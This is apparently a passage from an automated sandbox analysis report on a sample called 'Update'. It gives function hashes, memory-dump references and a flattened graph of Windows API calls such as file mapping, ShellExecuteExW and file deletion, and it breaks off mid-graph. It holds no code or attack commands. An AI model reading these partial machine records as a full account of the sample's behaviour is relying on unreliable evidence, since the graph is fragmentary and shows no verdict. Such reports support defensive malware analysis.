                                                                                              • Instruction Fuzzy Hash: A75159A2A8D6494FE301FB7CD4A9CF43FA0EF8530678485B6D04AC7397DD28A485C784
                                                                                              Function 00007FFAAC480BFA Relevance: .1, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: faf05d1a4c46023347efa1338191544bab42ef865fd360a8f1da3cf217fc8abe
                                                                                              • Instruction ID: 71f472f8db4eef887f35f877e463a65fea7a4b9878be5e8b1b3c86605e46b6a7
                                                                                              • Opcode Fuzzy Hash: faf05d1a4c46023347efa1338191544bab42ef865fd360a8f1da3cf217fc8abe
                                                                                              • Instruction Fuzzy Hash: E9317171A58A0E8FEB44EB78C469AFD7BE1FF99301F608579D00AD3386DD24A845C790
                                                                                              Function 00007FFAAC480870 Relevance: .1, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 59374cc9141bf71daca7900853c4bc123ce5f831c6b89591471673d0dba03bf2
                                                                                              • Instruction ID: a2a26c5cf730193edded7250586d6219b4b3d7846aecd81d801b187291aed231
                                                                                              • Opcode Fuzzy Hash: 59374cc9141bf71daca7900853c4bc123ce5f831c6b89591471673d0dba03bf2
                                                                                              • Instruction Fuzzy Hash: 93317EA169C64D5FE342EB28D4AACE97FB1AB88303BD0C4A5D80BC3397DD246940C781
                                                                                              Function 00007FFAAC481652 Relevance: .1, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d4a56286f3eaaa3662aa9241e36dca64f23bb37a3ebaa2eadc8159f2edce45fb
                                                                                              • Instruction ID: cfdd2e64492540103135121df00a83cfb165b3ae016ecdaa3ed75cb561065fb3
                                                                                              • Opcode Fuzzy Hash: d4a56286f3eaaa3662aa9241e36dca64f23bb37a3ebaa2eadc8159f2edce45fb
                                                                                              • Instruction Fuzzy Hash: 4C119061E1490E8BEB44E798D85A5FCB7B1FF89211F508376D01FF2296CE24294587C4
                                                                                              Function 00007FFAAC482001 Relevance: .1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3c26187b5e12d06c9e805bbc0d2f234399195f55bf2ae0a7b131f73521aaee08
                                                                                              • Instruction ID: 5b6dc41c9a2a9097a303e54a90e5db2b5faef75f6a116c1736df9aa48ceb8888
                                                                                              • Opcode Fuzzy Hash: 3c26187b5e12d06c9e805bbc0d2f234399195f55bf2ae0a7b131f73521aaee08
                                                                                              • Instruction Fuzzy Hash: E501284080E7854FF755A738586D4766FE0DFA7355B0445BAE88DC2193DC089A45C3D6

                                                                                              Execution Graph

                                                                                              Execution Coverage:9.5%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:5.1%
                                                                                              Total number of Nodes:1495
                                                                                              Total number of Limit Nodes:30
                                                                                              execution_graph 23491 c7dec2 23492 c7decf 23491->23492 23499 c6e617 23492->23499 23500 c6e627 23499->23500 23511 c6e648 23500->23511 23503 c64092 23534 c64065 23503->23534 23506 c7b568 PeekMessageW 23507 c7b583 GetMessageW 23506->23507 23508 c7b5bc 23506->23508 23509 c7b599 IsDialogMessageW 23507->23509 23510 c7b5a8 TranslateMessage DispatchMessageW 23507->23510 23509->23508 23509->23510 23510->23508 23517 c6d9b0 23511->23517 23514 c6e645 23514->23503 23515 c6e66b LoadStringW 23515->23514 23516 c6e682 LoadStringW 23515->23516 23516->23514 23522 c6d8ec 23517->23522 23519 c6d9cd 23520 c6d9e2 23519->23520 23530 c6d9f0 26 API calls 23519->23530 23520->23514 23520->23515 23523 c6d904 23522->23523 23529 c6d984 _strncpy 23522->23529 23525 c6d928 23523->23525 23531 c71da7 WideCharToMultiByte 23523->23531 23526 c6d959 23525->23526 23532 c6e5b1 50 API calls __vsnprintf 23525->23532 23533 c86159 26 API calls 3 library calls 23526->23533 23529->23519 23530->23520 23531->23525 23532->23526 23533->23529 23535 c6407c __vsnwprintf_l 23534->23535 23538 c85fd4 23535->23538 23541 c84097 23538->23541 23542 c840bf 23541->23542 23543 c840d7 23541->23543 23565 c891a8 20 API calls __dosmaperr 23542->23565 23543->23542 23545 c840df 23543->23545 23567 c84636 23545->23567 23546 c840c4 23566 c89087 26 API calls __cftof 23546->23566 23550 c840cf 23558 c7fbbc 23550->23558 23553 c64086 SetDlgItemTextW 23553->23506 23554 c84167 23576 c849e6 51 API calls 3 library calls 23554->23576 23557 c84172 23577 c846b9 20 API calls _free 23557->23577 23559 c7fbc5 IsProcessorFeaturePresent 23558->23559 23560 c7fbc4 23558->23560 23562 c7fc07 23559->23562 23560->23553 23578 c7fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23562->23578 23564 c7fcea 23564->23553 23565->23546 23566->23550 23568 c840ef 23567->23568 23569 c84653 23567->23569 23575 c84601 20 API calls 2 library calls 23568->23575 23569->23568 23579 c897e5 GetLastError 23569->23579 23571 c84674 23600 c8993a 38 API calls __cftof 23571->23600 23573 c8468d 23601 c89967 38 API calls __cftof 23573->23601 23575->23554 23576->23557 23577->23550 23578->23564 23580 c897fb 23579->23580 23581 c89807 23579->23581 23602 c8ae5b 11 API calls 2 library calls 23580->23602 23603 c8b136 20 API calls 2 library calls 23581->23603 23584 c89801 23584->23581 23586 c89850 SetLastError 23584->23586 23585 c89813 23587 c8981b 23585->23587 23610 c8aeb1 11 API calls 2 library calls 23585->23610 23586->23571 23604 c88dcc 23587->23604 23590 c89830 23590->23587 23592 c89837 23590->23592 23591 c89821 23593 c8985c SetLastError 23591->23593 23611 c89649 20 API calls _unexpected 23592->23611 23612 c88d24 38 API calls _abort 23593->23612 23595 c89842 23597 c88dcc _free 20 API calls 23595->23597 23599 c89849 23597->23599 23599->23586 23599->23593 23600->23573 23601->23568 23602->23584 23603->23585 23605 c88e00 _free 23604->23605 23606 c88dd7 RtlFreeHeap 23604->23606 23605->23591 23606->23605 23607 c88dec 23606->23607 23613 c891a8 20 API calls __dosmaperr 23607->23613 23609 c88df2 GetLastError 23609->23605 23610->23590 23611->23595 23613->23609 25454 c7b5c0 100 API calls 25455 c777c0 118 API calls 25456 c7ffc0 RaiseException _com_raise_error _com_error::_com_error 25406 c762ca 123 API calls __InternalCxxFrameHandler 23674 c7e2d7 23675 c7e1db 23674->23675 23676 c7e85d ___delayLoadHelper2@8 14 API calls 23675->23676 23676->23675 25407 c80ada 51 API calls 2 library calls 23678 c610d5 23683 c65abd 23678->23683 23684 c65ac7 __EH_prolog 23683->23684 23690 c6b505 23684->23690 23686 c65ad3 23696 c65cac GetCurrentProcess GetProcessAffinityMask 23686->23696 23691 c6b50f __EH_prolog 23690->23691 23697 c6f1d0 82 API calls 23691->23697 23693 c6b521 23698 c6b61e 23693->23698 23697->23693 23699 c6b630 _abort 23698->23699 23702 c710dc 23699->23702 23705 c7109e GetCurrentProcess GetProcessAffinityMask 23702->23705 23706 c6b597 23705->23706 23706->23686 25408 c7f4d3 20 API calls 23707 c7e1d1 14 API calls ___delayLoadHelper2@8 25458 c8a3d0 21 API calls 2 library calls 25459 c92bd0 VariantClear 23817 c7eae7 23818 c7eaf1 23817->23818 23819 c7e85d ___delayLoadHelper2@8 14 API calls 23818->23819 23820 c7eafe 23819->23820 25410 c7f4e7 29 API calls _abort 23984 c7b7e0 23985 c7b7ea __EH_prolog 23984->23985 24152 c61316 23985->24152 23988 c7b841 23989 c7bf0f 24224 c7d69e 23989->24224 23990 c7b82a 23990->23988 23992 c7b89b 23990->23992 23993 c7b838 23990->23993 23995 c7b92e GetDlgItemTextW 23992->23995 24001 c7b8b1 23992->24001 23996 c7b83c 23993->23996 23997 c7b878 23993->23997 23995->23997 24000 c7b96b 23995->24000 23996->23988 24008 c6e617 53 API calls 23996->24008 23997->23988 24005 c7b95f EndDialog 23997->24005 23998 c7bf2a SendMessageW 23999 c7bf38 23998->23999 24002 c7bf52 GetDlgItem SendMessageW 23999->24002 24003 c7bf41 SendDlgItemMessageW 23999->24003 24006 c7b980 GetDlgItem 24000->24006 24149 c7b974 24000->24149 24007 c6e617 53 API calls 24001->24007 24242 c7a64d GetCurrentDirectoryW 24002->24242 24003->24002 24005->23988 24010 c7b9b7 SetFocus 24006->24010 24011 c7b994 SendMessageW SendMessageW 24006->24011 24012 c7b8ce SetDlgItemTextW 24007->24012 24013 c7b85b 24008->24013 24009 c7bf82 GetDlgItem 24015 c7bfa5 SetWindowTextW 24009->24015 24016 c7bf9f 24009->24016 24017 c7b9c7 24010->24017 24028 c7b9e0 24010->24028 24011->24010 24018 c7b8d9 24012->24018 24264 c6124f SHGetMalloc 24013->24264 24243 c7abab GetClassNameW 24015->24243 24016->24015 24022 c6e617 53 API calls 24017->24022 24018->23988 24025 c7b8e6 GetMessageW 24018->24025 24019 c7b862 24019->23988 24027 c7c1fc SetDlgItemTextW 24019->24027 24020 c7be55 24023 c6e617 53 API calls 24020->24023 24026 c7b9d1 24022->24026 24029 c7be65 SetDlgItemTextW 24023->24029 24025->23988 24031 c7b8fd IsDialogMessageW 24025->24031 24265 c7d4d4 24026->24265 24027->23988 24036 c6e617 53 API calls 24028->24036 24033 c7be79 24029->24033 24031->24018 24035 c7b90c TranslateMessage DispatchMessageW 24031->24035 24038 c6e617 53 API calls 24033->24038 24035->24018 24037 c7ba17 24036->24037 24040 c64092 _swprintf 51 API calls 24037->24040 24071 c7be9c _wcslen 24038->24071 24039 c7bff0 24044 c7c020 24039->24044 24047 c6e617 53 API calls 24039->24047 24045 c7ba29 24040->24045 24041 c7b9d9 24162 c6a0b1 24041->24162 24042 c7c73f 97 API calls 24042->24039 24051 c7c73f 97 API calls 24044->24051 24085 c7c0d8 24044->24085 24053 c7d4d4 16 API calls 24045->24053 24050 c7c003 SetDlgItemTextW 24047->24050 24048 c7ba73 24168 c7ac04 SetCurrentDirectoryW 24048->24168 24049 c7ba68 GetLastError 24049->24048 24054 c6e617 53 API calls 24050->24054 24062 c7c03b 24051->24062 24052 c7c18b 24056 c7c194 EnableWindow 24052->24056 24057 c7c19d 24052->24057 24053->24041 24059 c7c017 SetDlgItemTextW 24054->24059 24056->24057 24063 c7c1ba 24057->24063 24283 c612d3 GetDlgItem EnableWindow 24057->24283 24058 c7beed 24061 c6e617 53 API calls 24058->24061 24059->24044 24060 c7ba87 24065 c7ba9e 24060->24065 24066 c7ba90 GetLastError 24060->24066 24061->23988 24067 c7c04d 24062->24067 24091 c7c072 24062->24091 24064 c7c1e1 24063->24064 24076 c7c1d9 SendMessageW 24063->24076 24064->23988 24077 c6e617 53 API calls 24064->24077 24073 c7bb11 24065->24073 24078 c7baae GetTickCount 24065->24078 24079 c7bb20 24065->24079 24066->24065 24281 c79ed5 32 API calls 24067->24281 24068 c7c0cb 24072 c7c73f 97 API calls 24068->24072 24070 c7c1b0 24284 c612d3 GetDlgItem EnableWindow 24070->24284 24071->24058 24080 c6e617 53 API calls 24071->24080 24072->24085 24073->24079 24081 c7bd56 24073->24081 24076->24064 24077->24019 24084 c64092 _swprintf 51 API calls 24078->24084 24088 c7bcfb 24079->24088 24089 c7bcf1 24079->24089 24090 c7bb39 GetModuleFileNameW 24079->24090 24086 c7bed0 24080->24086 24184 c612f1 GetDlgItem ShowWindow 24081->24184 24082 c7c066 24082->24091 24093 c7bac7 24084->24093 24085->24052 24087 c7c169 24085->24087 24100 c6e617 53 API calls 24085->24100 24094 c64092 _swprintf 51 API calls 24086->24094 24282 c79ed5 32 API calls 24087->24282 24097 c6e617 53 API calls 24088->24097 24089->23997 24089->24088 24275 c6f28c 82 API calls 24090->24275 24091->24068 24098 c7c73f 97 API calls 24091->24098 24092 c7bd66 24185 c612f1 GetDlgItem ShowWindow 24092->24185 24169 c6966e 24093->24169 24094->24058 24103 c7bd05 24097->24103 24104 c7c0a0 24098->24104 24100->24085 24101 c7c188 24101->24052 24102 c7bb5f 24106 c64092 _swprintf 51 API calls 24102->24106 24107 c64092 _swprintf 51 API calls 24103->24107 24104->24068 24109 c7c0a9 DialogBoxParamW 24104->24109 24105 c7bd70 24110 c6e617 53 API calls 24105->24110 24112 c7bb81 CreateFileMappingW 24106->24112 24108 c7bd23 24107->24108 24122 c6e617 53 API calls 24108->24122 24109->23997 24109->24068 24113 c7bd7a SetDlgItemTextW 24110->24113 24115 c7bbe3 GetCommandLineW 24112->24115 24144 c7bc60 __InternalCxxFrameHandler 24112->24144 24186 c612f1 GetDlgItem ShowWindow 24113->24186 24114 c7baed 24118 c7baf4 GetLastError 24114->24118 24119 c7baff 24114->24119 24120 c7bbf4 24115->24120 24116 c7bc6b ShellExecuteExW 24142 c7bc88 24116->24142 24118->24119 24177 c6959a 24119->24177 24276 c7b425 SHGetMalloc 24120->24276 24126 c7bd3d 24122->24126 24123 c7bd8c SetDlgItemTextW GetDlgItem 24127 c7bdc1 24123->24127 24128 c7bda9 GetWindowLongW SetWindowLongW 24123->24128 24125 c7bc10 24277 c7b425 SHGetMalloc 24125->24277 24187 c7c73f 24127->24187 24128->24127 24131 c7bc1c 24278 c7b425 SHGetMalloc 24131->24278 24134 c7bccb 24134->24089 24140 c7bce1 UnmapViewOfFile CloseHandle 24134->24140 24135 c7c73f 97 API calls 24137 c7bddd 24135->24137 24136 c7bc28 24279 c6f3fa 82 API calls 2 library calls 24136->24279 24212 c7da52 24137->24212 24140->24089 24141 c7bc3f MapViewOfFile 24141->24144 24142->24134 24145 c7bcb7 Sleep 24142->24145 24144->24116 24145->24134 24145->24142 24146 c7c73f 97 API calls 24150 c7be03 24146->24150 24147 c7be2c 24280 c612d3 GetDlgItem EnableWindow 24147->24280 24149->23997 24149->24020 24150->24147 24151 c7c73f 97 API calls 24150->24151 24151->24147 24153 c6131f 24152->24153 24154 c61378 24152->24154 24156 c61385 24153->24156 24285 c6e2e8 62 API calls 2 library calls 24153->24285 24286 c6e2c1 GetWindowLongW SetWindowLongW 24154->24286 24156->23988 24156->23989 24156->23990 24158 c61341 24158->24156 24159 c61354 GetDlgItem 24158->24159 24159->24156 24160 c61364 24159->24160 24160->24156 24161 c6136a SetWindowTextW 24160->24161 24161->24156 24163 c6a0bb 24162->24163 24164 c6a14c 24163->24164 24167 c6a175 24163->24167 24287 c6a2b2 24163->24287 24165 c6a2b2 8 API calls 24164->24165 24164->24167 24165->24167 24167->24048 24167->24049 24168->24060 24170 c69678 24169->24170 24171 c696d5 CreateFileW 24170->24171 24172 c696c9 24170->24172 24171->24172 24173 c6971f 24172->24173 24174 c6bb03 GetCurrentDirectoryW 24172->24174 24173->24114 24175 c69704 24174->24175 24175->24173 24176 c69708 CreateFileW 24175->24176 24176->24173 24178 c695be 24177->24178 24183 c695cf 24177->24183 24179 c695d1 24178->24179 24180 c695ca 24178->24180 24178->24183 24313 c69620 24179->24313 24308 c6974e 24180->24308 24183->24073 24184->24092 24185->24105 24186->24123 24188 c7c749 __EH_prolog 24187->24188 24189 c7bdcf 24188->24189 24190 c7b314 ExpandEnvironmentStringsW 24188->24190 24189->24135 24199 c7c780 _wcslen _wcsrchr 24190->24199 24192 c7b314 ExpandEnvironmentStringsW 24192->24199 24193 c7ca67 SetWindowTextW 24193->24199 24196 c83e3e 22 API calls 24196->24199 24198 c7c855 SetFileAttributesW 24200 c7c90f GetFileAttributesW 24198->24200 24211 c7c86f _abort _wcslen 24198->24211 24199->24189 24199->24192 24199->24193 24199->24196 24199->24198 24204 c7cc31 GetDlgItem SetWindowTextW SendMessageW 24199->24204 24207 c7cc71 SendMessageW 24199->24207 24328 c71fbb CompareStringW 24199->24328 24329 c7a64d GetCurrentDirectoryW 24199->24329 24331 c6a5d1 6 API calls 24199->24331 24332 c6a55a FindClose 24199->24332 24333 c7b48e 76 API calls 2 library calls 24199->24333 24200->24199 24203 c7c921 DeleteFileW 24200->24203 24203->24199 24205 c7c932 24203->24205 24204->24199 24206 c64092 _swprintf 51 API calls 24205->24206 24208 c7c952 GetFileAttributesW 24206->24208 24207->24199 24208->24205 24209 c7c967 MoveFileW 24208->24209 24209->24199 24210 c7c97f MoveFileExW 24209->24210 24210->24199 24211->24199 24211->24200 24330 c6b991 51 API calls 2 library calls 24211->24330 24213 c7da5c __EH_prolog 24212->24213 24334 c70659 24213->24334 24215 c7da8d 24338 c65b3d 24215->24338 24217 c7daab 24342 c67b0d 24217->24342 24221 c7dafe 24358 c67b9e 24221->24358 24223 c7bdee 24223->24146 24225 c7d6a8 24224->24225 24846 c7a5c6 24225->24846 24228 c7bf15 24228->23998 24228->23999 24229 c7d6b5 GetWindow 24229->24228 24232 c7d6d5 24229->24232 24230 c7d6e2 GetClassNameW 24851 c71fbb CompareStringW 24230->24851 24232->24228 24232->24230 24233 c7d706 GetWindowLongW 24232->24233 24234 c7d76a GetWindow 24232->24234 24233->24234 24235 c7d716 SendMessageW 24233->24235 24234->24228 24234->24232 24235->24234 24236 c7d72c GetObjectW 24235->24236 24852 c7a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24236->24852 24238 c7d743 24853 c7a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24238->24853 24854 c7a80c 8 API calls 24238->24854 24241 c7d754 SendMessageW DeleteObject 24241->24234 24242->24009 24244 c7abf1 24243->24244 24245 c7abcc 24243->24245 24246 c7abf6 SHAutoComplete 24244->24246 24247 c7abff 24244->24247 24857 c71fbb CompareStringW 24245->24857 24246->24247 24251 c7b093 24247->24251 24249 c7abdf 24249->24244 24250 c7abe3 FindWindowExW 24249->24250 24250->24244 24252 c7b09d __EH_prolog 24251->24252 24253 c613dc 84 API calls 24252->24253 24254 c7b0bf 24253->24254 24858 c61fdc 24254->24858 24257 c7b0eb 24259 c619af 128 API calls 24257->24259 24258 c7b0d9 24260 c61692 86 API calls 24258->24260 24263 c7b10d __InternalCxxFrameHandler ___std_exception_copy 24259->24263 24261 c7b0e4 24260->24261 24261->24039 24261->24042 24262 c61692 86 API calls 24262->24261 24263->24262 24264->24019 24266 c7b568 5 API calls 24265->24266 24267 c7d4e0 GetDlgItem 24266->24267 24268 c7d536 SendMessageW SendMessageW 24267->24268 24269 c7d502 24267->24269 24270 c7d572 24268->24270 24271 c7d591 SendMessageW SendMessageW SendMessageW 24268->24271 24274 c7d50d ShowWindow SendMessageW SendMessageW 24269->24274 24270->24271 24272 c7d5e7 SendMessageW 24271->24272 24273 c7d5c4 SendMessageW 24271->24273 24272->24041 24273->24272 24274->24268 24275->24102 24276->24125 24277->24131 24278->24136 24279->24141 24280->24149 24281->24082 24282->24101 24283->24070 24284->24063 24285->24158 24286->24156 24288 c6a2bf 24287->24288 24289 c6a2e3 24288->24289 24290 c6a2d6 CreateDirectoryW 24288->24290 24291 c6a231 3 API calls 24289->24291 24290->24289 24292 c6a316 24290->24292 24293 c6a2e9 24291->24293 24295 c6a325 24292->24295 24300 c6a4ed 24292->24300 24294 c6a329 GetLastError 24293->24294 24296 c6bb03 GetCurrentDirectoryW 24293->24296 24294->24295 24295->24163 24298 c6a2ff 24296->24298 24298->24294 24299 c6a303 CreateDirectoryW 24298->24299 24299->24292 24299->24294 24301 c7ec50 24300->24301 24302 c6a4fa SetFileAttributesW 24301->24302 24303 c6a510 24302->24303 24304 c6a53d 24302->24304 24305 c6bb03 GetCurrentDirectoryW 24303->24305 24304->24295 24306 c6a524 24305->24306 24306->24304 24307 c6a528 SetFileAttributesW 24306->24307 24307->24304 24309 c69781 24308->24309 24310 c69757 24308->24310 24309->24183 24310->24309 24319 c6a1e0 24310->24319 24314 c6962c 24313->24314 24317 c6964a 24313->24317 24316 c69638 CloseHandle 24314->24316 24314->24317 24315 c69669 24315->24183 24316->24317 24317->24315 24327 c66bd5 76 API calls 24317->24327 24320 c7ec50 24319->24320 24321 c6a1ed DeleteFileW 24320->24321 24322 c6a200 24321->24322 24323 c6977f 24321->24323 24324 c6bb03 GetCurrentDirectoryW 24322->24324 24323->24183 24325 c6a214 24324->24325 24325->24323 24326 c6a218 DeleteFileW 24325->24326 24326->24323 24327->24315 24328->24199 24329->24199 24330->24211 24331->24199 24332->24199 24333->24199 24335 c70666 _wcslen 24334->24335 24362 c617e9 24335->24362 24337 c7067e 24337->24215 24339 c70659 _wcslen 24338->24339 24340 c617e9 78 API calls 24339->24340 24341 c7067e 24340->24341 24341->24217 24343 c67b17 __EH_prolog 24342->24343 24379 c6ce40 24343->24379 24345 c67b32 24385 c7eb38 24345->24385 24347 c67b5c 24394 c74a76 24347->24394 24350 c67c7d 24351 c67c87 24350->24351 24353 c67cf1 24351->24353 24426 c6a56d 24351->24426 24355 c67d50 24353->24355 24404 c68284 24353->24404 24354 c67d92 24354->24221 24355->24354 24432 c6138b 74 API calls 24355->24432 24359 c67bac 24358->24359 24361 c67bb3 24358->24361 24360 c72297 86 API calls 24359->24360 24360->24361 24363 c6185a __InternalCxxFrameHandler 24362->24363 24364 c617ff 24362->24364 24363->24337 24365 c61828 24364->24365 24375 c66c36 76 API calls __vswprintf_c_l 24364->24375 24367 c61887 24365->24367 24372 c61847 ___std_exception_copy 24365->24372 24369 c83e3e 22 API calls 24367->24369 24368 c6181e 24376 c66ca7 75 API calls 24368->24376 24371 c6188e 24369->24371 24371->24363 24378 c66ca7 75 API calls 24371->24378 24372->24363 24377 c66ca7 75 API calls 24372->24377 24375->24368 24376->24365 24377->24363 24378->24363 24380 c6ce4a __EH_prolog 24379->24380 24381 c7eb38 8 API calls 24380->24381 24382 c6ce8d 24381->24382 24383 c7eb38 8 API calls 24382->24383 24384 c6ceb1 24383->24384 24384->24345 24387 c7eb3d ___std_exception_copy 24385->24387 24386 c7eb57 24386->24347 24387->24386 24390 c7eb59 24387->24390 24400 c87a5e 7 API calls 2 library calls 24387->24400 24389 c7f5c9 24402 c8238d RaiseException 24389->24402 24390->24389 24401 c8238d RaiseException 24390->24401 24393 c7f5e6 24395 c74a80 __EH_prolog 24394->24395 24396 c7eb38 8 API calls 24395->24396 24397 c74a9c 24396->24397 24398 c67b8b 24397->24398 24403 c70e46 80 API calls 24397->24403 24398->24350 24400->24387 24401->24389 24402->24393 24403->24398 24405 c6828e __EH_prolog 24404->24405 24433 c613dc 24405->24433 24407 c682aa 24408 c682bb 24407->24408 24576 c69f42 24407->24576 24411 c682f2 24408->24411 24441 c61a04 24408->24441 24572 c61692 24411->24572 24414 c68389 24460 c68430 24414->24460 24418 c683e8 24468 c61f6d 24418->24468 24420 c682ee 24420->24411 24420->24414 24424 c6a56d 7 API calls 24420->24424 24580 c6c0c5 CompareStringW _wcslen 24420->24580 24422 c683f3 24422->24411 24472 c63b2d 24422->24472 24484 c6848e 24422->24484 24424->24420 24427 c6a582 24426->24427 24428 c6a5b0 24427->24428 24835 c6a69b 24427->24835 24428->24351 24430 c6a592 24430->24428 24431 c6a597 FindClose 24430->24431 24431->24428 24432->24354 24434 c613e1 __EH_prolog 24433->24434 24435 c6ce40 8 API calls 24434->24435 24436 c61419 24435->24436 24437 c7eb38 8 API calls 24436->24437 24440 c61474 _abort 24436->24440 24438 c61461 24437->24438 24439 c6b505 84 API calls 24438->24439 24438->24440 24439->24440 24440->24407 24442 c61a0e __EH_prolog 24441->24442 24454 c61a61 24442->24454 24457 c61b9b 24442->24457 24581 c613ba 24442->24581 24444 c61bc7 24593 c6138b 74 API calls 24444->24593 24447 c63b2d 101 API calls 24451 c61c12 24447->24451 24448 c61bd4 24448->24447 24448->24457 24449 c61c5a 24453 c61c8d 24449->24453 24449->24457 24594 c6138b 74 API calls 24449->24594 24451->24449 24452 c63b2d 101 API calls 24451->24452 24452->24451 24453->24457 24458 c69e80 79 API calls 24453->24458 24454->24444 24454->24448 24454->24457 24455 c63b2d 101 API calls 24456 c61cde 24455->24456 24456->24455 24456->24457 24457->24420 24458->24456 24614 c6cf3d 24460->24614 24462 c68440 24618 c713d2 GetSystemTime SystemTimeToFileTime 24462->24618 24464 c683a3 24464->24418 24465 c71b66 24464->24465 24623 c7de6b 24465->24623 24469 c61f72 __EH_prolog 24468->24469 24471 c61fa6 24469->24471 24631 c619af 24469->24631 24471->24422 24473 c63b3d 24472->24473 24474 c63b39 24472->24474 24483 c69e80 79 API calls 24473->24483 24474->24422 24475 c63b4f 24476 c63b78 24475->24476 24478 c63b6a 24475->24478 24762 c6286b 101 API calls 3 library calls 24476->24762 24479 c63baa 24478->24479 24761 c632f7 89 API calls 2 library calls 24478->24761 24479->24422 24481 c63b76 24481->24479 24763 c620d7 74 API calls 24481->24763 24483->24475 24485 c68498 __EH_prolog 24484->24485 24490 c684d5 24485->24490 24495 c68513 24485->24495 24788 c78c8d 103 API calls 24485->24788 24487 c684f5 24488 c6851c 24487->24488 24489 c684fa 24487->24489 24488->24495 24790 c78c8d 103 API calls 24488->24790 24489->24495 24789 c67a0d 152 API calls 24489->24789 24490->24487 24494 c6857a 24490->24494 24490->24495 24494->24495 24764 c65d1a 24494->24764 24495->24422 24496 c68605 24496->24495 24770 c68167 24496->24770 24499 c68797 24500 c6a56d 7 API calls 24499->24500 24501 c68802 24499->24501 24500->24501 24776 c67c0d 24501->24776 24503 c6d051 82 API calls 24504 c6885d 24503->24504 24504->24495 24504->24503 24505 c6898b 24504->24505 24507 c68992 24504->24507 24791 c68117 84 API calls 24504->24791 24792 c62021 74 API calls 24504->24792 24793 c62021 74 API calls 24505->24793 24506 c68a5f 24511 c68ab6 24506->24511 24524 c68a6a 24506->24524 24507->24506 24510 c689e1 24507->24510 24514 c68b14 24510->24514 24517 c68a4c 24510->24517 24519 c6a231 3 API calls 24510->24519 24511->24517 24796 c67fc0 97 API calls 24511->24796 24512 c68ab4 24518 c6959a 80 API calls 24512->24518 24513 c69105 24516 c6959a 80 API calls 24513->24516 24514->24513 24532 c68b82 24514->24532 24797 c698bc 24514->24797 24516->24495 24517->24512 24517->24514 24518->24495 24520 c68a19 24519->24520 24520->24517 24794 c692a3 97 API calls 24520->24794 24522 c6ab1a 8 API calls 24525 c68bd1 24522->24525 24524->24512 24795 c67db2 101 API calls 24524->24795 24526 c6ab1a 8 API calls 24525->24526 24546 c68be7 24526->24546 24530 c68b70 24801 c66e98 77 API calls 24530->24801 24532->24522 24533 c68cbc 24534 c68e40 24533->24534 24535 c68d18 24533->24535 24538 c68e66 24534->24538 24539 c68e52 24534->24539 24558 c68d49 24534->24558 24536 c68d8a 24535->24536 24537 c68d28 24535->24537 24543 c68167 19 API calls 24536->24543 24540 c68d6e 24537->24540 24547 c68d37 24537->24547 24542 c73377 75 API calls 24538->24542 24541 c69215 123 API calls 24539->24541 24540->24558 24804 c677b8 111 API calls 24540->24804 24541->24558 24544 c68e7f 24542->24544 24548 c68dbd 24543->24548 24807 c73020 123 API calls 24544->24807 24545 c68c93 24545->24533 24802 c69a3c 82 API calls 24545->24802 24546->24533 24546->24545 24552 c6981a 79 API calls 24546->24552 24803 c62021 74 API calls 24547->24803 24554 c68de6 24548->24554 24555 c68df5 24548->24555 24548->24558 24552->24545 24805 c67542 85 API calls 24554->24805 24806 c69155 93 API calls __EH_prolog 24555->24806 24561 c68f85 24558->24561 24808 c62021 74 API calls 24558->24808 24560 c69090 24560->24513 24563 c6a4ed 3 API calls 24560->24563 24561->24513 24561->24560 24562 c6903e 24561->24562 24782 c69f09 SetEndOfFile 24561->24782 24783 c69da2 24562->24783 24566 c690eb 24563->24566 24566->24513 24809 c62021 74 API calls 24566->24809 24567 c69085 24569 c69620 77 API calls 24567->24569 24569->24560 24570 c690fb 24810 c66dcb 76 API calls 24570->24810 24574 c616a4 24572->24574 24826 c6cee1 24574->24826 24577 c69f59 24576->24577 24578 c69f63 24577->24578 24834 c66d0c 78 API calls 24577->24834 24578->24408 24580->24420 24595 c61732 24581->24595 24583 c613d6 24584 c69e80 24583->24584 24585 c69e92 24584->24585 24588 c69ea5 24584->24588 24590 c69eb0 24585->24590 24612 c66d5b 77 API calls 24585->24612 24586 c69eb8 SetFilePointer 24589 c69ed4 GetLastError 24586->24589 24586->24590 24588->24586 24588->24590 24589->24590 24591 c69ede 24589->24591 24590->24454 24591->24590 24613 c66d5b 77 API calls 24591->24613 24593->24457 24594->24453 24596 c61748 24595->24596 24607 c617a0 __InternalCxxFrameHandler 24595->24607 24597 c61771 24596->24597 24608 c66c36 76 API calls __vswprintf_c_l 24596->24608 24599 c617c7 